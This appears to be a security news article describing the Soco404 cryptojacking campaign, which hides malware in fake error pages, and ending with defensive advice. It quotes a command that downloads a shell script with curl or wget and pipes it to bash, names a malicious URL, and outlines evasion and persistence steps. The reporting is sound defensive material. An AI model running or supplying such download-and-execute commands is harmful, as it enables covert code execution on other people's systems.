A new wave of cryptojacking attacks, dubbed Soco404, is exploiting seemingly innocuous 404 error pages to deliver malicious payloads to both Linux and Windows systems. By embedding base64-encoded malware within these error screens, attackers can bypass traditional security measures and hijack system resources for cryptocurrency mining.
Understanding Soco404 Attacks
The Soco404 campaign leverages fake error pages hosted on platforms like Google Sites and compromised Apache Tomcat servers. These pages contain hidden base64-encoded payloads that, when decoded, execute malicious binaries on the target system. This method allows attackers to evade detection by traditional URL filtering and static analysis tools, as the malicious content is concealed within standard HTML tags.
First identified in mid-2025, Soco404 appears to be an evolution of earlier cryptojacking campaigns that targeted weak Tomcat credentials and unpatched Atlassian Confluence instances. Researchers at Wiz.io discovered this variant while monitoring unusual shell activity from publicly exposed PostgreSQL databases—a service that nearly one-third of cloud tenants leave open to the internet.
Infection Mechanism
The attack begins when a loader fetches a fake error page from a malicious URL, such as `https://www.fastsoco.top/1`. Within this page, the base64-encoded payload is hidden between custom markers like `exe101`. The loader decodes this payload directly into memory, effectively bypassing disk-based scanners.
Linux Infection Process:
1. Initial Command Execution: The attacker executes a command that downloads and runs a shell script:
“`bash
sh -c (curl http://:8080/soco.sh || wget -q -O- http://:8080/soco.sh) | bash
“`
2. Script Actions:
– Generates a random filename for the malicious binary.
– Terminates competing mining processes.
– Clears system logs to erase traces of the attack.
– If executed with root privileges, the script enables hugepages and adjusts CPU registers to optimize mining performance.
3. Execution and Persistence:
– A Go-based stub re-executes itself under the name `cpuhp/1`.
– The malware communicates with the attacker’s server and initiates an XMRig mining process targeting specific mining pools.
Windows Infection Process:
1. Payload Delivery: The attacker uses tools like `certutil`, `Invoke-WebRequest`, or `curl` to download a malicious executable (`ok.exe`) into the `C:\Users\Public\` directory.
2. Execution and Concealment:
– The executable spawns a `conhost.exe` process.
– Injects the main mining payload into this process.
– Deletes the original `ok.exe` file after a brief delay to minimize detection.
3. Persistence Mechanisms:
– The malware disguises itself as legitimate processes, such as `sd-pam` or `kworker/R-rcu_p` on Linux, and random eight-character service names on Windows.
– It schedules cron jobs and shell-init hooks on Linux or disables Windows Event Log to maintain persistence and evade detection.
Broader Context of Fake Error Page Exploits
The Soco404 campaign is part of a larger trend where cybercriminals use fake error messages to deceive users and deploy malware. For instance, attackers have been known to present fake CAPTCHA pages or browser error messages that prompt users to execute malicious commands. These tactics often involve instructing users to copy and paste commands into their system’s terminal, leading to the installation of malware such as information stealers or cryptominers.
Preventive Measures
To protect against such attacks, users and organizations should adopt the following practices:
– Exercise Caution with Error Messages: Be skeptical of unexpected error messages, especially those prompting manual actions like copying and pasting commands.
– Keep Systems Updated: Regularly update software and systems to patch vulnerabilities that attackers might exploit.
– Implement Network Segmentation: Limit exposure by segmenting networks and restricting access to critical systems.
– Monitor System Performance: Unexplained increases in CPU usage or power consumption can indicate unauthorized mining activities.
– Educate Users: Train employees to recognize phishing attempts and suspicious prompts that could lead to malware installation.
Conclusion
The Soco404 campaign underscores the evolving tactics of cybercriminals who exploit user trust and system vulnerabilities to deploy malware. By embedding malicious code within fake error pages, attackers can effectively bypass traditional security measures. Staying vigilant and implementing robust cybersecurity practices are essential to defend against such sophisticated threats.
